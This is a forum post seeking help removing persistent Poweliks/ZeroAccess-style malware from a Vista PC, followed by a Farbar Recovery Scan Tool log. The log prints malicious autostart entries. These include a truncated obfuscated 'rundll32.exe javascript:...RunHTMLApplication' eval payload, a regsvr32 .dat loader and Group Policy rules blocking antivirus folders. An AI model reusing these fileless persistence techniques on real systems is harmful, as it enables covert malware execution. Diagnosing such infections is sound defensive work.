Regenerating Bug


Good afternoon,

 

I have an infection on a friend's PC running Vista Home Premium 32-bit SP2 that is driving me to drink. I have tried to remove it myself using various tools but any progress I make is undone within minutes by this malware. So far, Combofix has listed a ZeroAccess rootkit that it has removed. MBAM has shown and allegedly removed 2 trojans. The first was a dropper.ed and agent.ed. The second one I don't remember the name of exactly. It was something along the lines of Milsap or some such. Chrome-like browser windows appear on their own with an IP address as the URL (one of which is from Scranton, PA I found out). The IPs cycle through in this order: 206.51.231.110, 66.197.157.20, 184.173.181.55 and operate under a process known as browser.exe. Each Chrome-like window stays up for a few seconds until the "unresponsive page" warning appears and the browser closes. It is followed by another soon after. Chrome itself is not installed on this computer. I followed the browser.exe process to the following directory: LocalLow/UIMobile/ValidatorVisual. Deleting either ValidatorVisual or UIMobile directories only fixes the issue until it regenerates. Upon deleting the UIMobile directory, the first file to return is titled JawaVinyl.pac, has a size of ~44,762KB, and is (given the extension) a proxy auto configuration file. On the various scans that I've run, some have pointed out that the computer is configured to use a proxy of the 127.0.0.1 port 5555. Looking at the connection settings under Internet Options, the computer is not configured to automatically detect nor use a hard-coded proxy.

 

Per the sticky, here are the FRST.txt and Addition.txt logs. I have been working on this at work. So, any references to the proxy address of 192.168.0.101:3128 are legit, as that is my employer's CentOS web proxy. Thanks in advance for your help.

 

FRST.txt

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:23-08-2014
Ran by savas.kyriakidis (administrator) on SAVASKYRIAKI-PC on 23-08-2014 16:54:35
Running from F:\
Platform: Microsoft® Windows Vista™ Home Premium  Service Pack 2 (X86) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal
 
The only official download link for FRST:
Download link from any site other than Bleeping Computer is unpermitted or outdated.
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(ATI Technologies Inc.) C:\Windows\System32\Ati2evxx.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(ATI Technologies Inc.) C:\Windows\System32\Ati2evxx.exe
(Stardock Corporation) C:\Program Files\Dell\DellDock\DockLogin.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(ActivIdentity) C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgfws.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgwdsvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(SolarWinds) C:\Windows\dwrcs\DWRCS.EXE
( ) C:\Windows\System32\lxblcoms.exe
() C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe
(Sony Corporation) C:\Program Files\Sony\PMB\PMBDeviceInfoProvider.exe
() C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgnsx.exe
(SolarWinds) C:\Windows\dwrcs\DWRCST.EXE
(Stardock Corporation) C:\Program Files\Dell\DellDock\DellDock.exe
(Realtek Semiconductor) C:\Windows\RtHDVCpl.exe
(CyberLink Corp.) C:\Program Files\Dell\MediaDirect\PCMService.exe
(Hewlett-Packard) C:\Program Files\HP\HP Software Update\hpwuSchd2.exe
(Sony Corporation) C:\Program Files\Sony\PMB\PMBVolumeWatcher.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgtray.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe
(Advanced Micro Devices Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe
(Apple Inc.) C:\Program Files\QuickTime\QTTask.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(Akamai Technologies, Inc.) C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\iCloudServices.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acsagent.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
() C:\Program Files\NETGEAR\WNA1100\WNA1100.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Glarysoft Ltd) C:\Program Files\Glary Utilities 5\Integrator.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Akamai Technologies, Inc.) C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe
(ATI Technologies Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqste08.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqbam08.exe
(Hewlett-Packard) C:\Program Files\HP\Digital Imaging\bin\hpqgpc01.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\APSDaemon.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbam.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [ECenter] => C:\Dell\E-Center\EULALauncher.exe [17920 2008-02-29] ( )
HKLM\...\Run: [RtHDVCpl] => C:\Windows\RtHDVCpl.exe [4706304 2008-03-06] (Realtek Semiconductor)
HKLM\...\Run: [startCCC] => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [90112 2006-11-10] ()
HKLM\...\Run: [dscactivate] => C:\Program Files\Dell Support Center\gs_agent\custom\dsca.exe [16384 2008-03-11] ( )
HKLM\...\Run: [PCMService] => C:\Program Files\Dell\MediaDirect\PCMService.exe [132392 2008-01-14] (CyberLink Corp.)
HKLM\...\Run: [AppleSyncNotifier] => C:\Program Files\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe [59240 2012-02-23] (Apple Inc.)
HKLM\...\Run: [HP Software Update] => C:\Program Files\HP\HP Software Update\HPWuSchd2.exe [54840 2007-05-08] (Hewlett-Packard)
HKLM\...\Run: [PMBVolumeWatcher] => C:\Program Files\Sony\PMB\PMBVolumeWatcher.exe [599328 2010-03-24] (Sony Corporation)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [997920 2011-06-15] (Microsoft Corporation)
HKLM\...\Run: [AVG_TRAY] => C:\Program Files\AVG\AVG10\avgtray.exe [2338656 2011-09-10] (AVG Technologies CZ, s.r.o.)
HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.)
HKLM\...\Run: [acevents] => C:\Program Files\ActivIdentity\ActivClient\acevents.exe [153640 2009-06-03] (ActivIdentity)
HKLM\...\Run: [accrdsub] => C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe [400936 2009-06-03] (ActivIdentity)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [152392 2014-08-01] (Apple Inc.)
HKLM\...\Run: [DameWare MRC Agent] => C:\Windows\dwrcs\DWRCST.exe [379752 2012-11-02] (SolarWinds)
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Malwarebytes <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\McAfee <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\AVG <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\AVG <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Malwarebytes' Anti-Malware <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\AVAST Software <====== ATTENTION
HKLM\...\Policies\Explorer: [useDefaultTile] 0
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [Akamai NetSession Interface] => C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe [4672920 2014-04-17] (Akamai Technologies, Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [iCloudServices] => C:\Program Files\Common Files\Apple\Internet Services\iCloudServices.exe [59720 2013-10-31] (Apple Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [com.apple.dav.bookmarks.daemon] => C:\Program Files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe [59720 2013-10-02] (Apple Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [ApplePhotoStreams] => C:\Program Files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe [59720 2013-10-31] (Apple Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [irfuqApivh] => regsvr32.exe "C:\ProgramData\IrfuqApivh\IrfuqApivh.dat"
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [GUDelayStartup] => C:\Program Files\Glary Utilities 5\StartupManager.exe [37152 2014-08-17] (Glarysoft Ltd)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [uINoteworthy] => C:\Windows\system32\rundll32.exe "C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll",DllRegisterServer <===== ATTENTION
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [spybot-S&D Cleaning] => C:\Windows\dwrcs\Uploads\SpybotPortable\App\Spybot\SDCleaner.exe [4566952 2014-06-24] (Safer-Networking Ltd.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\MountPoints2: F - F:\LaunchU3.exe -a
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\MountPoints2: {0ae3004a-a5e2-11df-a1d1-00219b005b31} - H:\LaunchU3.exe -a
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\MountPoints2: {a906d2bc-6084-11e3-9d8a-00219b005b31} - H:\LaunchU3.exe -a
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\Policies\system: [DisableChangePassword] 0
HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\Policies\system: [DisableLockWorkstation] 0
HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\Policies\Explorer: [NoLogOff] 0
HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\MountPoints2: F - F:\LaunchU3.exe -a
HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\MountPoints2: {0ae3004a-a5e2-11df-a1d1-00219b005b31} - H:\LaunchU3.exe -a
HKU\S-1-5-21-3726736968-409882640-1958551794-501\...\Run: [swg] => "C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
HKU\S-1-5-21-3726736968-409882640-1958551794-501\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-501\...\RunOnce: [spchecker] => C:\Program Files\AVG\AVG10\Notification\SPCheckerTE.exe [390472 2011-12-22] ()
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ActivClient Agent.lnk
ShortcutTarget: ActivClient Agent.lnk -> C:\Program Files\ActivIdentity\ActivClient\acsagent.exe (ActivIdentity)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk
ShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Metacafe.lnk
ShortcutTarget: Metacafe.lnk -> C:\$RECYCLE.BIN\S-1-5-21-3726736968-409882640-1958551794-1000\MetacafeAgent.exe (No File)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NETGEAR WNA1100 Smart Wizard.lnk
ShortcutTarget: NETGEAR WNA1100 Smart Wizard.lnk -> C:\Program Files\NETGEAR\WNA1100\WNA1100.exe ()
Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnk
ShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
Startup: C:\Users\Rita\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnk
ShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Rita\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
Startup: C:\Users\savas.kyriakidis\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnk
ShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\savas.kyriakidis\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
BootExecute: autocheck autochk *  BootDefrag.exesasnative32
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0xA02BBBD1D537CF01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-us
URLSearchHook: HKCU - (No Name) - {26842a09-ffa8-4e2c-ae12-0c80f01c3295} -  No File
SearchScopes: HKCU - DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: SSVHelper Class -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll (Sun Microsystems, Inc.)
BHO: CBrowserHelperObject Object -> {CA6319C0-31B7-401E-A518-A07C3DB8F777} -> C:\Program Files\Dell\BAE\BAE.dll (Dell Inc.)
BHO: HP Smart BHO Class -> {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} -> C:\Program Files\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll (Hewlett-Packard Co.)
Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
DPF: {5D637FAD-E202-48D1-8F18-5B9C459BD1E3} http://www.winkflash.com/photo/loaders/ImageUploader5.cab
DPF: {82E5DF24-51E8-47CD-864A-F4BD5005AA73} https://www.icloud.com/system/iCloud.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG10\avgpp.dll (AVG Technologies CZ, s.r.o.)
Winsock: Catalog5 01 %SystemRoot%\System32\mswsock.dll [223232] (Microsoft Corporation) ATTENTION: The LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1 66.18.32.2 66.18.32.3
 
FireFox:
========
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\4.0.60831.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-08-06]
FF HKLM\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2
FF Extension: HP Smart Web Printing - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2 [2010-09-02]
FF HKLM\...\Firefox\Extensions: [{1E73965B-8B48-48be-9C8D-68B920ABC1C4}] - C:\Program Files\AVG\AVG10\Firefox4
FF Extension: AVG Safe Search - C:\Program Files\AVG\AVG10\Firefox4 [2011-07-10]
FF HKCU\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2
 
Chrome: 
=======
CHR HKLM\...\Chrome\Extension: [icmlaeflemplmjndnaapfdbbnpncnbda] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx []
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 ac.sharedstore; C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe [207400 2009-06-03] (ActivIdentity)
S3 AVG Security Toolbar Service; C:\Program Files\AVG\AVG10\Toolbar\ToolbarBroker.exe [167264 2011-11-10] ()
R2 avgfws; C:\Program Files\AVG\AVG10\avgfws.exe [2708024 2011-03-09] (AVG Technologies CZ, s.r.o.)
S2 AVGIDSAgent; C:\Program Files\AVG\AVG10\Identity Protection\Agent\Bin\AVGIDSAgent.exe [7390560 2011-08-18] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files\AVG\AVG10\avgwdsvc.exe [269520 2011-02-08] (AVG Technologies CZ, s.r.o.)
R2 DockLoginService; C:\Program Files\Dell\DellDock\DockLogin.exe [161048 2008-04-28] (Stardock Corporation)
R2 dwmrcs; C:\Windows\dwrcs\DWRCS.EXE [705384 2012-11-02] (SolarWinds)
R3 hpqcxs08; C:\Program Files\HP\Digital Imaging\bin\hpqcxs08.dll [217088 2008-10-16] (Hewlett-Packard Co.) [File not signed]
R2 hpqddsvc; C:\Program Files\HP\Digital Imaging\bin\hpqddsvc.dll [135168 2008-10-16] (Hewlett-Packard Co.) [File not signed]
R2 HPSLPSVC; C:\Program Files\HP\Digital Imaging\bin\HPSLPSVC32.DLL [634880 2008-10-16] (Hewlett-Packard Co.) [File not signed]
S3 jswpsapi; C:\Program Files\NETGEAR\WNA1100\jswpsapi.exe [960992 2010-03-22] (Atheros Communications, Inc.)
R2 lxbl_device; C:\Windows\system32\lxblcoms.exe [537520 2007-04-20] ( )
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [44032 2008-07-18] (Hewlett-Packard) [File not signed]
S3 NisSrv; c:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe [208944 2011-04-27] (Microsoft Corporation)
R2 PassThru Service; C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe [87040 2012-03-23] () [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [53760 2008-07-18] (Hewlett-Packard) [File not signed]
R2 WSWNA1100; C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe [266240 2010-08-04] () [File not signed]
S2 vToolbarUpdater; C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\9.0.1\ToolbarUpdater.exe [X]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 athur; C:\Windows\System32\DRIVERS\athur.sys [1439744 2010-10-10] (Atheros Communications, Inc.)
R0 AVGIDSHX; C:\Windows\System32\DRIVERS\avgidshx.sys [147736 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 Avgldx86; C:\Windows\System32\DRIVERS\avgldx86.sys [248656 2011-01-07] (AVG Technologies CZ, s.r.o.)
R1 Avgmfx86; C:\Windows\System32\DRIVERS\avgmfx86.sys [34896 2011-03-01] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx86; C:\Windows\System32\DRIVERS\avgrkx86.sys [32592 2011-03-16] (AVG Technologies CZ, s.r.o.)
R1 Avgtdix; C:\Windows\System32\DRIVERS\avgtdix.sys [297168 2011-04-05] (AVG Technologies CZ, s.r.o.)
R0 BootDefragDriver; C:\Windows\System32\drivers\BootDefragDriver.sys [16064 2014-07-18] (Glarysoft Ltd)
S3 gfiark; C:\Windows\System32\drivers\gfiark.sys [43368 2013-05-23] (ThreatTrack Security)
R1 GUBootStartup; C:\Windows\System32\drivers\GUBootStartup.sys [17216 2014-08-14] (Glarysoft Ltd)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [110296 2014-08-23] (Malwarebytes Corporation)
R1 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [165648 2011-04-18] (Microsoft Corporation)
S3 MpNWMon; C:\Windows\System32\DRIVERS\MpNWMon.sys [43392 2011-04-18] (Microsoft Corporation)
R2 RtNdPt60; C:\Windows\System32\DRIVERS\RtNdPt60.sys [27648 2008-03-06] (Windows ® Codename Longhorn DDK provider)
R0 SCMNdisP; C:\Windows\System32\DRIVERS\scmndisp.sys [21728 2007-01-19] (Windows ® Codename Longhorn DDK provider)
S3 USBAAPL; C:\Windows\System32\Drivers\usbaapl.sys [42496 2011-08-02] (Apple, Inc.) [File not signed]
U5 AppMgmt; C:\Windows\system32\svchost.exe [21504 2008-01-20] (Microsoft Corporation)
S1 AVGIDSDriver; system32\DRIVERS\avgidsdriverx.sys [X]
S1 AVGIDSShim; system32\DRIVERS\avgidsshimx.sys [X]
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S1 MpKslb9ee2848; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{BFB5F758-88DD-40A2-8570-9299F94880E8}\MpKslb9ee2848.sys [X]
S1 MpKslbb89cfa8; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{A306A4ED-0116-4B29-AE29-DC65EC41A044}\MpKslbb89cfa8.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
S3 SWDUMon; system32\DRIVERS\SWDUMon.sys [X]
S3 TfNetMon; \??\C:\Windows\system32\drivers\TfNetMon.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-08-23 16:54 - 2014-08-23 16:54 - 00000000 ____D () C:\FRST
2014-08-23 16:30 - 2014-08-23 16:30 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-08-23 16:30 - 2014-08-23 16:30 - 00000901 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-08-23 16:30 - 2014-08-23 16:30 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-23 16:30 - 2014-08-23 16:30 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-08-23 16:30 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-08-23 16:30 - 2014-05-12 07:25 - 00074456 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-08-23 16:30 - 2014-05-12 07:25 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-08-23 16:16 - 2014-08-23 16:16 - 00009460 _____ () C:\ComboFix.txt
2014-08-23 12:25 - 2011-06-26 02:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-08-23 12:25 - 2010-11-07 13:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-08-23 12:25 - 2009-04-20 00:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00098816 _____ () C:\Windows\sed.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00080412 _____ () C:\Windows\grep.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00068096 _____ () C:\Windows\zip.exe
2014-08-23 12:12 - 2014-08-23 12:12 - 00007836 _____ () C:\Users\savas.kyriakidis\Desktop\reg.txt
2014-08-23 12:03 - 2014-08-23 12:03 - 00009362 _____ () C:\Users\savas.kyriakidis\Desktop\safer.txt
2014-08-23 11:51 - 2014-08-23 11:53 - 00000000 ____D () C:\AdwCleaner
2014-08-23 11:49 - 2014-08-23 11:49 - 00007919 _____ () C:\Users\savas.kyriakidis\Desktop\JRT.txt
2014-08-23 11:42 - 2014-08-23 11:42 - 00000000 ____D () C:\Windows\ERUNT
2014-08-23 11:23 - 2014-08-23 11:25 - 00001106 _____ () C:\Users\savas.kyriakidis\Desktop\Live PC Help.lnk
2014-08-23 11:02 - 2014-08-23 11:05 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2014-08-22 17:06 - 2013-09-04 14:57 - 00024040 _____ (ThreatTrack Security) C:\Windows\system32\Drivers\gfiutil.sys
2014-08-22 17:06 - 2013-05-23 08:39 - 00043368 _____ (ThreatTrack Security) C:\Windows\system32\Drivers\gfiark.sys
2014-08-22 17:05 - 2014-08-22 21:40 - 00000000 ____D () C:\VIPRERESCUE
2014-08-22 17:05 - 2014-08-22 17:05 - 00000000 ____D () C:\EEK
2014-08-22 16:12 - 2014-08-23 16:20 - 00038790 _____ () C:\Windows\PFRO.log
2014-08-22 15:52 - 2014-08-23 16:16 - 00000000 ____D () C:\Qoobox
